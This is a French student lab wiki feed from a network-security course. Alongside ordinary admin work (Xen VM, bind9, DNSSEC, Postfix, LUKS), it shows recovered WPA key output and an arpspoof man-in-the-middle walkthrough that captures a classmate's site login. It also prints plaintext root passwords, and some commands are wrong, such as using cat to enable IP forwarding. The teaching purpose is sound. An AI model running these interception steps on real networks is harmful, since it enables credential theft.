                           KEY FOUND! [ 10244444 ]&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
      Master Key     : D6 B0 55 29 8C A0 B4 C9 13 24 C9 03 8C D5 13 4B &lt;br /&gt;
                       46 A4 C2 DB 79 E7 4C BC AE B5 5A 5D 48 D7 C4 3B &lt;br /&gt;
 &lt;br /&gt;
      Transient Key  : 25 23 28 1B 21 51 4B 87 07 51 A4 8E D1 80 48 C8 &lt;br /&gt;
                       54 F6 87 8B 30 DF C1 D0 E6 1A 74 87 2F 50 EC 1B &lt;br /&gt;
                       9B 24 39 29 40 E3 BD 89 CD AE 3E 81 E9 EC 16 70 &lt;br /&gt;
                       79 F9 24 2E 30 4E 52 24 A9 41 30 52 E1 25 EC 85 &lt;br /&gt;
 &lt;br /&gt;
      EAPOL HMAC     : 7F AC 76 7D B5 33 0C 24 20 C3 BA A2 4B DF 2F CD&lt;br /&gt;
&lt;br /&gt;
On a bien trouver la clé du wifi !&lt;br /&gt;
On voit que cela peut prendre beaucoup de temps pour trouver la clé, d'out l'interner de couper le dictionnaire en plusieurs et lancer le traitement sur plusieurs pc des camarades de classe. Cela permet de diviser le temps de traitement par le nombre de machine utilisé.&lt;br /&gt;
&lt;br /&gt;
===Exploitation de failles du système===&lt;br /&gt;
&lt;br /&gt;
===Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP===&lt;br /&gt;
Maintenant on tesnt une attaque par &amp;quot;homme au milieu&amp;quot; pour commancé, on va installer le paquetage &amp;lt;code&amp;gt;dsniff&amp;lt;/code&amp;gt; pour cela on utilise la commande : &amp;lt;code&amp;gt;apt-get install dsniff&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On regarde dans un premier temps si le pc peut se comporter comme un routeur avec la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/ip_forward&amp;lt;/code&amp;gt; normalement il nous notifie '0' se qui prouve que le pc ne se comporte pas comme un routeur. On utilise la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/ip_forward&amp;lt;/code&amp;gt; pour faire passer la variable a 1. maintenant le PC peut se comporter comme un routeur.&lt;br /&gt;
&lt;br /&gt;
On fait la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/conf/all/rp_filter&amp;lt;/code&amp;gt; la variable recu doit être a '0' ce qui permet aux pc de renvoyer les requètes sur l'interface qui les a recu.&lt;br /&gt;
&lt;br /&gt;
Ensuite on fait un &amp;lt;code&amp;gt;ip r&amp;lt;/code&amp;gt; pour récupérer l'adresse ip du routeur.&lt;br /&gt;
[[Fichier:Ip_r_mirage.png|1000px|thumb|left|capture de la commande ip r]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On fait la commande &amp;lt;code&amp;gt;arpspoof -i bridge -t zabeth07 172.26.145.254&amp;lt;/code&amp;gt;&lt;br /&gt;
On lance Wireshark en root en utilisant la commande &amp;lt;code&amp;gt;su&amp;lt;/code&amp;gt; si celui ci n'est pas installer on fait préalablement &amp;lt;code&amp;gt;apt-get install wireshark&amp;lt;/code&amp;gt;&lt;br /&gt;
Une fois Wireshark lancé, on filtre tout les paquets en provenance de nottre cible la zabeth07.&lt;br /&gt;
Il faut fauire attention de bien désativer les proxi dans firefow sinon cela ne fonctionne pas.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Wireshark_mirage.png|1000px|thumb|left|capture de Wiresharkf]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut voir que on a bien recupérer les mdp lors de la connexion aux site 'applications.polytech-lille.net'.&lt;br /&gt;
 Non d'utilisateur : Oui le pas de calais&lt;br /&gt;
 Mdp : le mdp&lt;br /&gt;
&lt;br /&gt;
=== Intrusion sur un serveur d’application Web===&lt;br /&gt;
&lt;br /&gt;
==Réalisations==&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de données===&lt;br /&gt;
&lt;br /&gt;
===Chiffrement de données===&lt;br /&gt;
&lt;br /&gt;
Parfois il est necessaire de chiffrer les données importante,d'avoir des clef USB, ou des fichier sécuriser. Pour sécuriser la clef USB, on va utilisé 'cryptsetup'&lt;br /&gt;
pour commancer on installe les paquetages 'lvm2' et 'cryptsetup'.&lt;br /&gt;
 apt-get install cryptsetup&lt;br /&gt;
 apt-get install lvm2 &lt;br /&gt;
&lt;br /&gt;
Le [https://doc.ubuntu-fr.org/cryptsetup site] on peut trouver la liste des commandes necessaire pour crypter le clef USB.&lt;br /&gt;
&lt;br /&gt;
Premièrement on va formaté la clef usb pour avoir un disque propre avec la commande &amp;lt;code&amp;gt;mkfs.vfat -n 'Alex.G' -I /dev/sdb1&amp;lt;/code&amp;gt; on obtien le nom de la clef USB avec la commande &amp;lt;code&amp;gt;df -h&amp;lt;/code&amp;gt;&lt;br /&gt;
On a maintenant une clef USB clean qui a comme nom Alex.G et un format FAT32.&lt;br /&gt;
&lt;br /&gt;
On peut lancer le cryptage de la clef USB avec la commande &amp;lt;code&amp;gt;cryptsetup luksFormat -c aes-xts-plain -s 512 /dev/sdb&amp;lt;/code&amp;gt; Pour savoir ou les la clef USB on utilise la commande &amp;lt;code&amp;gt;lsblk&amp;lt;/code&amp;gt;&lt;br /&gt;
On choisi un mdp pour le clef USB, puis on envoie le fichier etc sur le clef pour vérifier si il est bien encrypter. Une fois la clef crypter avec un fichier dessu, on va sur un autre pc et on, vérifie si le fichier est bien crypter.&lt;br /&gt;
La liste des commande utilisé est listé ci-dessous : &lt;br /&gt;
 mount /dev/mapper/Alex.G /mnt&lt;br /&gt;
 cp -r /etc /mnt&lt;br /&gt;
 umount /mnt&lt;br /&gt;
 cryptsetup luksClose Alex.G&lt;br /&gt;
&lt;br /&gt;
On peut voir que le clef USB crypter fonctionne bien.&lt;br /&gt;
[[Fichier:ClefUSBLock_2020-11-13_11-48-55.png|1000px|thumb|left|Cryptage de la clef USB]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Inspection ARP par un élément réseau===&lt;br /&gt;
&lt;br /&gt;
===Sécurisation WiFi par WPA2-EAP===&lt;/div&gt;</summary>
		<author><name>Aglaine</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G5&amp;diff=54009</id>
		<title>TP sysres IMA2a5 2020/2021 G5</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G5&amp;diff=54009"/>
				<updated>2020-11-27T17:01:32Z</updated>
		
		<summary type="html">&lt;p&gt;Aglaine : /* Installation des systèmes d’exploitation */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système vous aurez à installer une machine virtuelle Xen et à y configurer des services. Enfin la mise en place d’un réseau WiFi sécurisé et d’un site web sécurisé vous permettent de mettre en pratiques vos connaissances en la matière.&lt;br /&gt;
&lt;br /&gt;
=== Tableau Récapitulatif ===&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Vlan7&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|193.48.57.168/26&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|2001:660:4401:60a2:216:3eff:fe95:d093/64&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de de la VM &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|mirage&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth06&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Adresse du site internet version HTTP&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|http://www.glopglop.site/&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Adresse du site internet version HTTPS&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|https://www.glopglop.site/&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Installation des systèmes d’exploitation == &lt;br /&gt;
&lt;br /&gt;
Pour installer une Machine Virtuelle, il faut d'abord se connecter sur le disque de virtualisation.&lt;br /&gt;
Pour cela, il faut utiliser la commande : &lt;br /&gt;
 ssh capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
=== Installation dans la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Une fois connecter, il faut lancer la création de la Machine virtuelle avec la commande :&lt;br /&gt;
  xen-create-image --hostname=mirage --ip 193.48.57.168 --netmask=255.255.255.0 --gateway=100.64.0.5 --dist=ascii --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
L'installation prend un certain temps pour regarder si l'installation se déroule bien, on peut ouvrir un second terminale connecté en SSH a &amp;quot;capbreton&amp;quot; puis on utilise la commande : &lt;br /&gt;
 tail -f /var/log/xen-tools/mirage.0.log&lt;br /&gt;
&lt;br /&gt;
A la fin de l'installation, on obtient le mot de passe root et des informations importantes :&lt;br /&gt;
      Installation Summary&lt;br /&gt;
     ---------------------&lt;br /&gt;
     Hostname        :  mirage&lt;br /&gt;
     Distribution    :  ascii&lt;br /&gt;
     MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
     IP Address(es)  :  dynamic&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
     Root Password   :  DgtUlOmnBFERdfarGBsopGR&lt;br /&gt;
&lt;br /&gt;
Une fois la VM créer, nous pouvons la lancer avec la commande :&lt;br /&gt;
 xl create /etc/xen/mirage.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que le VM est bien démarrer avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
Pour fonctionner l'état de la VM doit être r ou -b&lt;br /&gt;
[[Fichier:LancementVm.PNG|1000px|thumb|left|Liste des VM en fonctionnement]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On accède pour la premier fois a nottre Vm avec la commande :&lt;br /&gt;
 xl console mirage&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). &lt;br /&gt;
Après nous être logué, on change le mot de passe qui devient : glopglopglop.&lt;br /&gt;
&lt;br /&gt;
=== Configuration de la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Il faut maintenant installer les packages que nous avons besoins : &lt;br /&gt;
 apt-get update&lt;br /&gt;
 apt-get install VIM&lt;br /&gt;
&lt;br /&gt;
Il faut configurer l'adresse IP et le mask de la VM. Pour cela on utilise la commande :&lt;br /&gt;
 vim /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
Dans interfaces on tajoute &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.168&lt;br /&gt;
 gateway 193.58.57.163&lt;br /&gt;
 netmask 255.255.255.248&lt;br /&gt;
&lt;br /&gt;
Pour que la machine soit joignable par SSH via l'extérieure il est nécessaire de configurer la passerelle et le ssh_config. Pour cela on utilise la commande :&lt;br /&gt;
 vi /etc/ssh/ssh_config&lt;br /&gt;
 &lt;br /&gt;
Le fichier ssh_config doit être configurer comme ci dessous :&lt;br /&gt;
 Host *&lt;br /&gt;
 SendEnv LANH LC_*&lt;br /&gt;
 HashKnownHOST yes&lt;br /&gt;
 GSSAPIAuthentification yes&lt;br /&gt;
&lt;br /&gt;
Sur Capbreton, une paserell doit être mis en place pour pouvoir connecté les VM aux monde extérieure.&lt;br /&gt;
Pour cela on configure ces interfacte avec la commande : &lt;br /&gt;
 vim/etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
Puis on configure la passerelle comme ci dessous : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
  auto lo&lt;br /&gt;
  iface lo inet loopback&lt;br /&gt;
 &lt;br /&gt;
  # Physical Network Interfaces&lt;br /&gt;
  #&lt;br /&gt;
 auto eth&lt;br /&gt;
  iface eth inet static&lt;br /&gt;
    address 192.168.0.29&lt;br /&gt;
    netmask 255.255.255.0&lt;br /&gt;
    gateway 192.168.0.1&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
  iface eth0 inet manual&lt;br /&gt;
   post-up ip link set $IFACE up&lt;br /&gt;
   post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth1&lt;br /&gt;
  iface eth1 inet manual&lt;br /&gt;
   post-up ip link set $IFACE up&lt;br /&gt;
   post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth2&lt;br /&gt;
 iface eth2 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth4&lt;br /&gt;
 iface eth4 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth5&lt;br /&gt;
 iface eth5 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth6&lt;br /&gt;
 iface eth6 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth7&lt;br /&gt;
 iface eth7 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 # Main trunk bridge&lt;br /&gt;
 #&lt;br /&gt;
 auto Trunk&lt;br /&gt;
 iface Trunk inet manual&lt;br /&gt;
  bridge_ports eth4 eth5&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 # Virtual Network Interfaces&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto vlan48&lt;br /&gt;
 iface vlan48 inet static&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  address 172.26.191.21&lt;br /&gt;
  netmask 255.255.252.0&lt;br /&gt;
  gateway 172.26.191.254&lt;br /&gt;
 iface vlan48 inet6 auto&lt;br /&gt;
 &lt;br /&gt;
 auto vlan500&lt;br /&gt;
 iface vlan500 inet manual&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto vlan502&lt;br /&gt;
 iface vlan502 inet manual&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 # Bridge for IMA5sc group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto IMA5sc&lt;br /&gt;
 iface IMA5sc inet manual&lt;br /&gt;
  bridge_ports eth0 eth6&lt;br /&gt;
 # Bridge for IMA2a5&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth1 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto L3MRIT&lt;br /&gt;
 iface L3MRIT inet manual&lt;br /&gt;
  bridge_ports eth2&lt;br /&gt;
 # Bridge for GIS group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto bridgeGIS&lt;br /&gt;
 iface bridgeGIS inet manual&lt;br /&gt;
  bridge_ports vlan502&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
===Sécurisation du réseau===&lt;br /&gt;
&lt;br /&gt;
==Services Internet==&lt;br /&gt;
&lt;br /&gt;
===Serveur SSH===&lt;br /&gt;
&lt;br /&gt;
On peux maintenant se connecté a la VM mirage avec la commande : &amp;lt;code&amp;gt;ssh root@193.48.57.168 -p 2222&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS===&lt;br /&gt;
Un serveur DNS (Domain Name System) permet d'effectuer correspondance entre un nom de domaine et une adresse IP. Grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP pour naviguer sur Ethernet. Pour installer notre propre serveur DNS nous avons utilisé Bind9.&lt;br /&gt;
&lt;br /&gt;
Nous commençons tout d'abord par installer bind9 via la commande suivante : &amp;lt;code&amp;gt;apt-get install bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Création et configuration named.conf.local ====&lt;br /&gt;
Le &amp;lt;code&amp;gt;named.conf.local&amp;lt;/code&amp;gt; permet de faire pointer un nom de domaine pleinement qualifié (FQDN fully qualified domain name) sur une adresse IP. &lt;br /&gt;
&lt;br /&gt;
Il faut tout d'abbord modifié le fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; qui contient la configuration DNS et y déclaré les zones associées au domaine ainsi qu'un fichier de description de la zone.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Mirage-config-named.conf.local.png|1000px|thumb|left|Configuration de mirage]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis créé le fichier de configuration appelé &amp;lt;code&amp;gt;glopglop.site&amp;lt;/code&amp;gt; avec la commande &amp;lt;code&amp;gt;vim /etc/bind/glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Configuration_bind9.png|1000px|thumb|left|Configuration de bind9]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On relance le service 'bind9' avec la commande :&amp;lt;code&amp;gt;service bind9 restart&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On vérifie que le DNS fonctionne bien avec le commande &amp;lt;code&amp;gt;host dns1.glopglop.site localhost&amp;lt;/code&amp;gt;&lt;br /&gt;
[[Fichier:Dns1.glopglop.site_2020-11-13_08-57-52.png|1000px|thumb|left|Vérification du DNS en local]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
Le DNS fonctionne donc bien.&lt;br /&gt;
&lt;br /&gt;
==== Configuration gandi.net ====&lt;br /&gt;
Grâce au registrar gandi.net, nous avons réservé le nom de domaine &amp;lt;code&amp;gt;glopglop.site&amp;lt;/code&amp;gt;. L'extension &amp;lt;code&amp;gt;.site&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Gandi-glopglop-VueGeneral.PNG|1000px|thumb|left|Image de la configuration de Gandi]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On va maintenant ajouter un &amp;quot;glue record&amp;quot; qui est un enregistrement collé. Il permet d'associer un nom d'hôte avec une adresse IP au registre.&lt;br /&gt;
Glue records fournis par gandi pour associer un hostname (nom de serveur ou DNS) à l'adresse IP de notre machine. Les modifications seront effectives entre 12 et 24 heures.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Mirage-Ajoue-GlueRecord.PNG|1000px|thumb|left|Image de la configuration de Gandi avec Glue Record]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois le &amp;quot;glue record&amp;quot; renseigner se qui va lié nottre dns a une ip, il faur renseigner les serveur de non. cela prend 27/72h.&lt;br /&gt;
Il faut bien faire attention que la VM soit correctement configurer avec 'bind9' car c'est lui qui donne IPv4 et IPv6 correspondant à vos noms de machines. Si ce n'est pas le cas gandi ne pourras pas liée les dns a l'ip de la machine.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:GandiDNS_2020-11-13_09-00-16.png|1000px|thumb|left|DNS sur GANDI]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois les serveuyrs de non configurer, on peux fermer GANDI.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
Premièrement, on ajoute &amp;lt;code&amp;gt;l'obtion dnssec-enable yes;&amp;lt;/code&amp;gt; dans le fichier &amp;lt;code&amp;gt;named.conf.options&amp;lt;/code&amp;gt;.&lt;br /&gt;
====Génération des clef asymétrique====&lt;br /&gt;
Il est important de bien sauvegarder la clef privée, sinon nottre système de clef ne fonctionnera pas.&lt;br /&gt;
pour commancer, on crée un repertoire pour stocker les clef.&lt;br /&gt;
  cd /etc/bind&lt;br /&gt;
  mkdir glopglop.site.dnssec&lt;br /&gt;
  cd glopglop.site.dnssec/&lt;br /&gt;
&lt;br /&gt;
Une fois dans le dossier &amp;lt;code&amp;gt;glopglop.site.dnssec&amp;lt;/code&amp;gt;, on crée les clefs avec la commande&amp;lt;code&amp;gt;dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
On obtien : &lt;br /&gt;
 Generating key pair...............+++++ ..........................................+++++ &lt;br /&gt;
 Kglopglop.site.+005+15337&lt;br /&gt;
&lt;br /&gt;
On crée ensuite le clef asymétrique pour la signature des enregistrements, pour cela on utilise la commande &amp;lt;code&amp;gt;dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
On obtien : &lt;br /&gt;
 Generating key pair................+++++ ..................................................+++++ &lt;br /&gt;
 Kglopglop.site.+005+55608&lt;br /&gt;
&lt;br /&gt;
On a bien maintenant la paire de clef privée/publique. Le problème est qu'il est difficile de les distinguer avec leurs nom compliquer, il faut donc les rennomer pouyr plus de transparance.&lt;br /&gt;
On renomme donc les deux paires de clefs obtenues en utilisant le nom de la zone comme préfixe puis en suffixant d’abord par la destination de la clef (-ksk pour la KSK ou -zsk pour la ZSK) puis par le type de clef (.key pour la clef publique ou .private pour la clef privée);&lt;br /&gt;
&lt;br /&gt;
 mv Kglopglop.site.+005+15337.key glopglop.site-ksk.key&lt;br /&gt;
 mv Kglopglop.site.+005+15337.private glopglop.site-ksk.private&lt;br /&gt;
 mv Kglopglop.site.+005+55608.key glopglop.site-zsk.key&lt;br /&gt;
 mv Kglopglop.site.+005+55608.private glopglop.site-zsk.private&lt;br /&gt;
&lt;br /&gt;
[[Fichier:ClefPrivéePublique_2020-11-13_09-23-42.png|1000px|thumb|left|Clef Privée et Public]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans &amp;lt;code&amp;gt;db.glopglop.site&amp;lt;/code&amp;gt; on ajoute les deux lignes ci-dessous : &lt;br /&gt;
 $include /etc/bind/glopglop.site.dnssec/glopglop.site-ksk.key&lt;br /&gt;
 $include /etc/bind/glopglop.site.dnssec/glopglop.site-zsk.key&lt;br /&gt;
&lt;br /&gt;
On signe la zone d'enregistremment avec la commande &amp;lt;code&amp;gt;dnssec-signzone -o glopglop.site -k glopglop.site-ksk ../db.glopglop.site glopglop.site-zsk&amp;lt;/code&amp;gt;&lt;br /&gt;
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|Generation des zones d'enregistrement]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Les clef sont maintenant fonctionelle il faut donc les ajouter a GANDI, pour cela on se connecte a gandi puis on ajoute une clef KSK.&lt;br /&gt;
pour obtenir la cled on utilise la commande &amp;lt;code&amp;gt;cat glopglop.site-ksk.key&amp;lt;/code&amp;gt; on obtien le résultat ci-dessous : &lt;br /&gt;
 ; This is a key-signing key, keyid 15337, for glopglop.site.&lt;br /&gt;
 ; Created: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 ; Publish: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 ; Activate: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 glopglop.site. IN DNSKEY 257 3 5 AwEAAc3TCJkWFGnZSj/Q364AF7n69UaXum/no+LuEbXbGjTXLETdYk+Q gVAmIpvbJXcG0rucJTbVFaHr8IhWqf7VvkCbEGAORAkzBVXThPDR1pZR lJDEY88Lb2T6k9uHw43l2oP8vPev2eIRbU3VxUuJs++elgj32DTBA+yK p++/gz29H6PQVpkHnH81RjGdV+K1RZEwxkuev2MmB329fhMRwTsbW0BV aeXc5faRk9ZEKb7tr0p7txVv4wZEL6it01ZiNyGktwLRj8ln+cQz1GtC PY/UWnCtamycE/2k4f98sdDa6TMiguuBNOPug+ODzqGiI7LNUyF4jBbf 6NAgChwITps=&lt;br /&gt;
&lt;br /&gt;
On ajoute la clef a gandi comme montrer ci-dessous en n'oubliant pas de selectionner '5(RSA/SHA-1'.&lt;br /&gt;
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|gandi enregistrement de la clef KSK]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que tout fonctionne correctement, on va sur le site 'dnsvizi.net' il nous permet d'analyser le dns et représanter la chaine d'autentification DNSSEC.&lt;br /&gt;
[[Fichier:DNSSEC_2020-11-13_11-59-06.png|1000px|thumb|left|Test du DNSSEC]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut voir que maintenant on a bien le statu 'SECURE' donc tout fonctionne bien.&lt;br /&gt;
&lt;br /&gt;
===Installation d'une méchagerie===&lt;br /&gt;
====Configuration de Postfix====&lt;br /&gt;
Pour recevoir le mail de vérfication de GANDI il faut sur la VM un gestionnaire de mail il faut installer mutt et postfix. On utilise les commandes ci-dessous : &lt;br /&gt;
 apt-get install postfix&lt;br /&gt;
 ant-get install mutt&lt;br /&gt;
&lt;br /&gt;
A l'installation de 'postfix' un fenètre de configuration s'ouver. &lt;br /&gt;
Il faut renseigner le non du site comme 'System mail name : 'glopglop.site'&lt;br /&gt;
&lt;br /&gt;
On vérifie la configuration de 'postix' en allant dans le 'main.cf'&lt;br /&gt;
 vi /etc/postfix/main.cf &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Config Postfix mirage.png|1000px|thumb|left|Configuration de postfix]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On a bien le non de domaine 'glopglop.site' on peut relancer 'postfix'&lt;br /&gt;
 service postfix restart&lt;br /&gt;
Si le service n'est pas configurer correctement, on peut le reconfigurer avec la commande &amp;lt;code&amp;gt;dpkg-reconfigure postfix&amp;lt;/code&amp;gt;&lt;br /&gt;
====Réception d'un message====&lt;br /&gt;
On peux testé la reception de message en envoyant un message a 'roor@glopglop.site'&lt;br /&gt;
Si tout fonctionne bien, on peux visualisé les méssage recu en tappant la commande &amp;lt;code&amp;gt;mutt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Reception_messages_mirage.png|1000px|thumb|left|texte descriptif]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On constate que on resoit bien les message en provenance du mail de Polytech.&lt;br /&gt;
Pour que gandi puissent nous envoyer le mail contenant la clef de cryptage, on a besoint de pouvoir recevoirr les messages qui sont destiné a 'admin@glopglop.site'&lt;br /&gt;
&lt;br /&gt;
